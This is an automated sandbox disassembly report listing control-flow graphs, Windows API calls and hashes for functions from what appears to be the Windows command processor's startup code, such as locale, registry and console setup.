                                                                            control_flow_graph 96 b08572-b085a6 call b08791 GetLocaleInfoW 99 b1b2f9-b1b300 96->99 100 b085ac-b085c4 GetLocaleInfoW 96->100 101 b1b302-b1b30a 99->101 102 b08602-b0861c GetLocaleInfoW 100->102 103 b085c6-b085cb 100->103 106 b1b320-b1b322 101->106 107 b1b30c-b1b313 101->107 104 b0863e-b0865e GetLocaleInfoW 102->104 105 b0861e-b08628 102->105 108 b085d1-b085d7 103->108 111 b08660-b08667 104->111 112 b08673-b08685 GetLocaleInfoW 104->112 109 b1b331-b1b334 105->109 110 b0862e-b08634 105->110 114 b1b324 106->114 115 b1b327-b1b329 106->115 107->106 113 b1b315-b1b31e 107->113 116 b08787-b08789 108->116 117 b085dd-b085e0 108->117 118 b1b336-b1b339 109->118 119 b1b358-b1b36c 109->119 110->104 111->112 120 b08669 111->120 121 b1b371-b1b378 112->121 122 b0868b-b086a0 GetLocaleInfoW 112->122 113->101 113->106 114->115 115->109 116->99 123 b085e2-b085ea 117->123 124 b085fb-b085fd 117->124 118->104 126 b1b33f-b1b353 118->126 119->104 120->112 127 b1b37a-b1b382 121->127 128 b086a6-b086b8 GetLocaleInfoW 122->128 129 b1b3a9-b1b3b0 122->129 123->116 125 b085f0-b085f9 123->125 124->102 125->108 125->124 126->104 130 b1b384-b1b38b 127->130 131 b1b398-b1b39a 127->131 132 b1b3e1-b1b3e8 128->132 133 b086be-b086d0 GetLocaleInfoW 128->133 134 b1b3b2-b1b3ba 129->134 130->131 136 b1b38d-b1b396 130->136 137 b1b39c 131->137 138 b1b39f-b1b3a1 131->138 135 b1b3ea-b1b3f2 132->135 139 b086d6-b086e8 GetLocaleInfoW 133->139 140 b1b419-b1b420 133->140 141 b1b3d0-b1b3d2 134->141 142 b1b3bc-b1b3c3 134->142 145 b1b3f4-b1b3fb 135->145 146 b1b408-b1b40a 135->146 136->127 136->131 137->138 138->129 148 b1b451-b1b458 139->148 149 b086ee-b08700 GetLocaleInfoW 139->149 147 b1b422-b1b42a 140->147 143 b1b3d4 141->143 144 b1b3d7-b1b3d9 141->144 142->141 150 b1b3c5-b1b3ce 142->150 143->144 144->132 145->146 152 b1b3fd-b1b406 145->152 153 b1b40c 146->153 154 b1b40f-b1b411 146->154 155 b1b440-b1b442 147->155 156 b1b42c-b1b433 147->156 151 b1b45a-b1b462 148->151 157 b08706-b08718 GetLocaleInfoW 149->157 158 b1b489-b1b490 149->158 150->134 150->141 161 b1b464-b1b46b 151->161 162 b1b478-b1b47a 151->162 152->135 152->146 153->154 154->140 159 b1b444 155->159 160 b1b447-b1b449 155->160 156->155 164 b1b435-b1b43e 156->164 165 b1b4c1-b1b4c8 157->165 166 b0871e-b08730 GetLocaleInfoW 157->166 163 b1b492-b1b49a 158->163 159->160 160->148 161->162 170 b1b46d-b1b476 161->170 171 b1b47c 162->171 172 b1b47f-b1b481 162->172 173 b1b4b0-b1b4b2 163->173 174 b1b49c-b1b4a3 163->174 164->147 164->155 169 b1b4ca-b1b4d2 165->169 167 b08736-b0874b GetLocaleInfoW 166->167 168 b1b4f9-b1b4fe 166->168 177 b08751-b08763 GetLocaleInfoW 167->177 178 b1b52f-b1b536 167->178 181 b1b500-b1b508 168->181 179 b1b4d4-b1b4db 169->179 180 b1b4e8-b1b4ea 169->180 170->151 170->162 171->172 172->158 175 b1b4b4 173->175 176 b1b4b7-b1b4b9 173->176 174->173 182 b1b4a5-b1b4ae 174->182 175->176 176->165 183 b1b567-b1b56c 177->183 184 b08769-b08786 setlocale call b16b30 177->184 185 b1b538-b1b540 178->185 179->180 186 b1b4dd-b1b4e6 179->186 187 b1b4ec 180->187 188 b1b4ef-b1b4f1 180->188 189 b1b50a-b1b511 181->189 190 b1b51e-b1b520 181->190 182->163 182->173 196 b1b56e-b1b576 183->196 194 b1b542-b1b549 185->194 195 b1b556-b1b558 185->195 186->169 186->180 187->188 188->168 189->190 197 b1b513-b1b51c 189->197 191 b1b522 190->191 192 b1b525-b1b527 190->192 191->192 192->178 194->195 199 b1b54b-b1b554 194->199 200 b1b55a 195->200 201 b1b55d-b1b55f 195->201 202 b1b578-b1b57f 196->202 203 b1b58c-b1b58e 196->203 197->181 197->190 199->185 199->195 200->201 201->183 202->203 206 b1b581-b1b58a 202->206 204 b1b590 203->204 205 b1b593-b1b595 203->205 204->205 206->196 206->203
                                                                            APIs
                                                                              • Part of subcall function 00B08791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00B06906,0000001F,?,00000080), ref: 00B08791
                                                                            • GetLocaleInfoW.KERNELBASE(00000000,0000001E,00B3C9E0,00000008), ref: 00B0859E
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00B085BC
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00B08614
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00B08653
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,00B3C9D0,00000008), ref: 00B0867D
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,00B3C970,00000020), ref: 00B08698
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,00B3C930,00000020), ref: 00B086B0
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,00B3C8F0,00000020), ref: 00B086C8
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,00B3C8B0,00000020), ref: 00B086E0
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,00B3C870,00000020), ref: 00B086F8
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,00B3C830,00000020), ref: 00B08710
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,00B3C7F0,00000020), ref: 00B08728
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,00B3C9C0,00000008), ref: 00B08743
                                                                            • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,00B3C9B0,00000008), ref: 00B0875B
                                                                            • setlocale.MSVCRT ref: 00B08770
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale$DefaultUsersetlocale
                                                                            • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                            • API String ID: 1351325837-2236139042
                                                                            • Opcode ID: 9aac8a9dfacbfb29b8c35138c4c22c4bdf0c4e179dbfdeb968b79d38f65aa0f7
                                                                            • Instruction ID: c8320ee0605d2481a711827ad68bad979aee5e4d0d1f9f7703ca9b6c58d9d3e2
                                                                            • Opcode Fuzzy Hash: 9aac8a9dfacbfb29b8c35138c4c22c4bdf0c4e179dbfdeb968b79d38f65aa0f7
                                                                            • Instruction Fuzzy Hash: F0C1E36670021296DB308F399D48BBB3BEDEF61750FA441A9E856D72C5EF74CA81C360
                                                                            Function 00B10207 Relevance: 9.2, APIs: 6, Instructions: 154fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 832 b10207-b10236 833 b10239-b10242 832->833 833->833 834 b10244-b1024a 833->834 835 b10250-b10255 834->835 836 b1037d 834->836 837 b10259-b10263 835->837 840 b1e739-b1e750 _wcsicmp 836->840 838 b10265-b10268 837->838 839 b1028c-b102a9 FindFirstFileW 837->839 838->839 841 b1026a-b10270 838->841 844 b1e798-b1e79b 839->844 845 b102af-b102bf FindClose 839->845 842 b102c5-b102cf 840->842 843 b1e756-b1e75d 840->843 841->837 846 b10272-b10289 call b16b30 841->846 848 b102d2-b102dd 842->848 845->842 847 b1034d-b10351 845->847 847->843 850 b10357-b10372 _wcsnicmp 847->850 848->848 849 b102df-b102f7 848->849 849->836 852 b102fd-b102ff 849->852 850->842 853 b10378 850->853 855 b1e762-b1e764 852->855 856 b10305-b10348 memcpy call b0f3a0 852->856 853->840 858 b1e767-b1e772 855->858 856->841 858->858 860 b1e774-b1e791 memmove 858->860 860->844
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,?,00000000,00000000,00000000), ref: 00B10297
                                                                            • FindClose.KERNELBASE(00000000), ref: 00B102B0
                                                                            • memcpy.MSVCRT(?,?,?), ref: 00B10311
                                                                            • _wcsnicmp.MSVCRT ref: 00B10367
                                                                            • _wcsicmp.MSVCRT ref: 00B1E746
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                                                            • String ID:
                                                                            • API String ID: 242869866-0
                                                                            • Opcode ID: 3e58f2520e2dabdd5c4829711c5398d9a7bd5ca21c37f41a9fbe67965d5241ef
                                                                            • Instruction ID: 7b6fff3c539e7d99af2ecc70c10ca11eec121086585ab64230c2a56b84a1ab82
                                                                            • Opcode Fuzzy Hash: 3e58f2520e2dabdd5c4829711c5398d9a7bd5ca21c37f41a9fbe67965d5241ef
                                                                            • Instruction Fuzzy Hash: 9151A2756183118BC724EF28DC485ABB7E5FFC8310F94495EE899C7280EB70D985CB96
                                                                            Function 00B0A9D4 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00B0A9C5), ref: 00B0A9D8
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00B0A9F3
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B0A9FA
                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 00B0AA09
                                                                            • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00B0AA12
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemcpy
                                                                            • String ID:
                                                                            • API String ID: 429350006-0
                                                                            • Opcode ID: 91992ee433738faabc4228e5f3d006270f669a6be3d388965a1e524fe3e80e02
                                                                            • Instruction ID: 9aad0b0ac723b391f0c6940f2cf629d6d2b2468ff6146f9f04da3a08cfdb676c
                                                                            • Opcode Fuzzy Hash: 91992ee433738faabc4228e5f3d006270f669a6be3d388965a1e524fe3e80e02
                                                                            • Instruction Fuzzy Hash: 90E0927B74122027D211376A2C88C6F2E9DEBC7661B050050F909E3291DE248D0286F3
                                                                            Function 00B16EC0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00016E70), ref: 00B16EC5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 0721d3ee359a5ccd90961a99c25e27381f0d0e44dc1c0d40a1f248d7eea7e857
                                                                            • Instruction ID: 1faabe25236424effada4f16a592e33eace16f5e9866fe7442ea85119ca10662
                                                                            • Opcode Fuzzy Hash: 0721d3ee359a5ccd90961a99c25e27381f0d0e44dc1c0d40a1f248d7eea7e857
                                                                            • Instruction Fuzzy Hash: 559002AD2D1100869A0457719C09445BBF16B496027814594E041C6164DF6441489566
                                                                            Function 00B087CA Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 270memorylibraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 b087ca-b08870 InitializeCriticalSection EnterCriticalSection LeaveCriticalSection SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call b0e310 call b0a9d4 call b08b96 call b08273 GetCommandLineW 9 b08873-b0887c 0->9 9->9 10 b0887e-b0888a 9->10 11 b08890-b0889f call b11a05 10->11 12 b08b37-b08b38 10->12 18 b088a5-b088db GetCommandLineW call b0f3a0 call b0e3f0 11->18 19 b08b2f-b08b35 11->19 14 b08b3d-b08b43 call b078e4 12->14 20 b08b44-b08b4c call b17d18 14->20 18->19 27 b088e1-b088e9 18->27 19->14 28 b088f0-b08903 call b08e9e call b100e9 27->28 29 b088eb 27->29 34 b08906-b0890f 28->34 29->28 34->34 35 b08911-b08930 call b0a24c 34->35 38 b08932 35->38 39 b08934-b0893d 35->39 38->39 40 b089ab-b089e1 GetConsoleOutputCP GetCPInfo call b08572 GetProcessHeap HeapAlloc 39->40 41 b0893f-b08943 39->41 47 b089e3-b089f1 GetConsoleTitleW 40->47 48 b089fd-b08a03 40->48 43 b08945 41->43 44 b08947-b08951 41->44 43->44 44->40 46 b08953-b0895a 44->46 46->40 49 b0895c-b0895e 46->49 47->48 50 b089f3-b089fa 47->50 51 b08a51-b08a57 48->51 52 b08a05-b08a0f call b09a11 48->52 53 b08960 49->53 54 b08962-b08979 call b078e4 49->54 50->48 55 b08a59-b08a8b call b270d6 call b04d08 call b063bd call b09950 51->55 56 b08abb-b08b08 GetModuleHandleW GetProcAddress * 3 51->56 52->51 67 b08a11-b08a1b 52->67 53->54 68 b08980-b0898f GetWindowsDirectoryW 54->68 69 b0897b 54->69 87 b08aa7-b08ab0 call b078e4 55->87 88 b08a8d-b08aa5 call b09950 * 2 55->88 60 b08b14-b08b16 56->60 61 b08b0a-b08b0d 56->61 66 b08b17-b08b28 free call b16b30 60->66 61->60 65 b08b0f-b08b12 61->65 65->60 65->66 79 b08b2d-b08b2e 66->79 73 b08a4c call b28496 67->73 74 b08a1d-b08a32 GetStdHandle GetConsoleScreenBufferInfo 67->74 68->20 70 b08995-b0899d 68->70 69->68 75 b089a4-b089a6 call b08bc7 70->75 76 b0899f 70->76 73->51 80 b08a40-b08a4a 74->80 81 b08a34-b08a3e 74->81 75->40 76->75 80->51 80->73 81->51 94 b08ab1-b08ab5 GlobalFree 87->94 88->94 94->56
                                                                            APIs
                                                                            • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00B3CA04), ref: 00B087EE
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B087FA
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B0880E
                                                                            • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00B27460,00000001), ref: 00B0881B
                                                                            • _get_osfhandle.MSVCRT ref: 00B08828
                                                                            • GetConsoleMode.KERNELBASE(00000000), ref: 00B08830
                                                                            • _get_osfhandle.MSVCRT ref: 00B0883C
                                                                            • GetConsoleMode.KERNELBASE(00000000), ref: 00B08844
                                                                              • Part of subcall function 00B0E310: _get_osfhandle.MSVCRT ref: 00B0E318
                                                                              • Part of subcall function 00B0E310: SetConsoleMode.KERNELBASE(00000000), ref: 00B0E322
                                                                              • Part of subcall function 00B0E310: _get_osfhandle.MSVCRT ref: 00B0E32F
                                                                              • Part of subcall function 00B0E310: GetConsoleMode.KERNELBASE(00000000), ref: 00B0E339
                                                                              • Part of subcall function 00B0E310: _get_osfhandle.MSVCRT ref: 00B0E35E
                                                                              • Part of subcall function 00B0E310: GetConsoleMode.KERNELBASE(00000000), ref: 00B0E368
                                                                              • Part of subcall function 00B0E310: _get_osfhandle.MSVCRT ref: 00B0E390
                                                                              • Part of subcall function 00B0E310: SetConsoleMode.KERNELBASE(00000000), ref: 00B0E39A
                                                                              • Part of subcall function 00B0A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00B0A9C5), ref: 00B0A9D8
                                                                              • Part of subcall function 00B0A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00B0A9F3
                                                                              • Part of subcall function 00B0A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 00B0A9FA
                                                                              • Part of subcall function 00B0A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 00B0AA09
                                                                              • Part of subcall function 00B0A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00B0AA12
                                                                              • Part of subcall function 00B08B96: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00B0885E), ref: 00B08B9D
                                                                              • Part of subcall function 00B08B96: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0885E), ref: 00B08BA4
                                                                              • Part of subcall function 00B08273: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00B082D3
                                                                              • Part of subcall function 00B08273: RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00B08313
                                                                              • Part of subcall function 00B08273: RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00B0834D
                                                                              • Part of subcall function 00B08273: RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00B0839D
                                                                              • Part of subcall function 00B08273: RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 00B083D7
                                                                            • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00B0886A
                                                                            • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00B088A5
                                                                            • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,-00000105,00000000), ref: 00B08987
                                                                            • GetConsoleOutputCP.KERNELBASE(?,?,00000000,-00000105,00000000), ref: 00B089AB
                                                                            • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00B3C9F0), ref: 00B089BC
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.KERNELBASE(00000000,0000001E,00B3C9E0,00000008), ref: 00B0859E
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00B085BC
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00B08614
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00B08653
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,00B3C9D0,00000008), ref: 00B0867D
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,00B3C970,00000020), ref: 00B08698
                                                                              • Part of subcall function 00B08572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,00B3C930,00000020), ref: 00B086B0
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 00B089CD
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B089D4
                                                                            • GetConsoleTitleW.KERNELBASE(00000000,00000104), ref: 00B089E9
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?), ref: 00B08A23
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00B08A2A
                                                                            • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00B08AB5
                                                                            • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00B08AC0
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00B08AD1
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00B08AE7
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00B08AF8
                                                                            • free.MSVCRT(?), ref: 00B08B18
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Console$Info$Locale$HeapMode_get_osfhandle$QueryValue$AddressCriticalProcProcessSection$AllocCommandEnvironmentFreeHandleLineStrings$AllocateBufferCtrlDirectoryEnterGlobalHandlerInitializeLeaveModuleOpenOutputScreenTitleWindowsfreememcpy
                                                                            • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                            • API String ID: 3313898297-3021193919
                                                                            • Opcode ID: 10064f11dd6be35d8b57ed57588e291ce91158815376329898c7e01f6069c7fe
                                                                            • Instruction ID: 5d10c3af432ab0a99c13a13cc9b3c4d30147f5f55dc7bc773b5e5230b99d9b83
                                                                            • Opcode Fuzzy Hash: 10064f11dd6be35d8b57ed57588e291ce91158815376329898c7e01f6069c7fe
                                                                            • Instruction Fuzzy Hash: 3791DE75A40300ABDB14ABA4AC5AA6E3FE9FB45700B1440A9F646DB2E1DF709B41CB16
                                                                            Function 00B08273 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 309registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 207 b08273-b082b7 call b17f80 210 b082bd-b082db RegOpenKeyExW 207->210 211 b08540-b0854c 210->211 212 b082e1-b0831b RegQueryValueExW 210->212 211->210 213 b08552-b08571 time srand call b16b30 211->213 214 b1b0f1-b1b0f8 212->214 215 b08321-b08355 RegQueryValueExW 212->215 217 b1b0fa-b1b108 214->217 218 b1b10d-b1b114 214->218 219 b08371-b083a5 RegQueryValueExW 215->219 220 b08357-b0835e 215->220 217->215 218->215 222 b1b11a-b1b134 _wtol 218->222 225 b1b165-b1b16c 219->225 226 b083ab-b083df RegQueryValueExW 219->226 223 b08364-b0836a 220->223 224 b1b139-b1b140 220->224 222->215 223->219 224->219 227 b1b146-b1b160 _wtol 224->227 228 b1b181-b1b188 225->228 229 b1b16e-b1b17c 225->229 230 b083e1-b083e8 226->230 231 b083fb-b0842f RegQueryValueExW 226->231 227->219 228->226 236 b1b18e-b1b1a8 _wtol 228->236 229->226 232 b1b1ad-b1b1b4 230->232 233 b083ee-b083f5 230->233 234 b08431-b08438 231->234 235 b0846c-b084a0 RegQueryValueExW 231->235 232->231 241 b1b1ba-b1b1cb wcstol 232->241 233->231 237 b1b1d3-b1b1da 234->237 238 b0843e-b0844e 234->238 239 b084a6-b084ad 235->239 240 b1b24c-b1b254 235->240 236->226 242 b1b1f5 237->242 243 b1b1dc-b1b1ed wcstol 237->243 244 b1b200-b1b202 238->244 245 b08454-b0845d 238->245 246 b084b3-b084c3 239->246 247 b1b20f-b1b216 239->247 248 b1b25a-b1b25d 240->248 241->237 242->244 243->242 249 b1b203-b1b20a 244->249 245->249 250 b08463-b08466 245->250 251 b084c9-b084d2 246->251 252 b1b23c-b1b23e 246->252 253 b1b231 247->253 254 b1b218-b1b229 wcstol 247->254 255 b1b263-b1b269 248->255 256 b084f4 248->256 249->235 250->235 250->249 257 b084d8-b084db 251->257 258 b1b23f-b1b241 251->258 252->258 253->252 254->253 259 b084fa-b0852e RegQueryValueExW 255->259 256->259 261 b1b26e-b1b271 256->261 257->258 260 b084e1-b084eb 257->260 258->240 264 b1b283-b1b28a 259->264 265 b08534-b0853a RegCloseKey 259->265 260->248 263 b084f1 260->263 261->259 262 b1b277-b1b27e 261->262 262->259 263->256 266 b1b2d9-b1b2e1 264->266 267 b1b28c-b1b2b5 ExpandEnvironmentStringsW 264->267 265->211 266->265 270 b1b2e7-b1b2f4 call b0acb0 266->270 268 b1b2b7-b1b2c8 call b0f3a0 267->268 269 b1b2ca-b1b2cc 267->269 272 b1b2d3 268->272 269->272 270->265 272->266
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00B082D3
                                                                            • RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00B08313
                                                                            • RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00B0834D
                                                                            • RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00B0839D
                                                                            • RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 00B083D7
                                                                            • RegQueryValueExW.KERNELBASE(?,CompletionChar,00000000,00000001,?,00001000), ref: 00B08427
                                                                            • RegQueryValueExW.KERNELBASE(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00B08498
                                                                            • RegQueryValueExW.KERNELBASE(?,AutoRun,00000000,00000004,?,00001000), ref: 00B08526
                                                                            • RegCloseKey.KERNELBASE(?), ref: 00B0853A
                                                                            • time.MSVCRT(00000000), ref: 00B08554
                                                                            • srand.MSVCRT ref: 00B0855B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
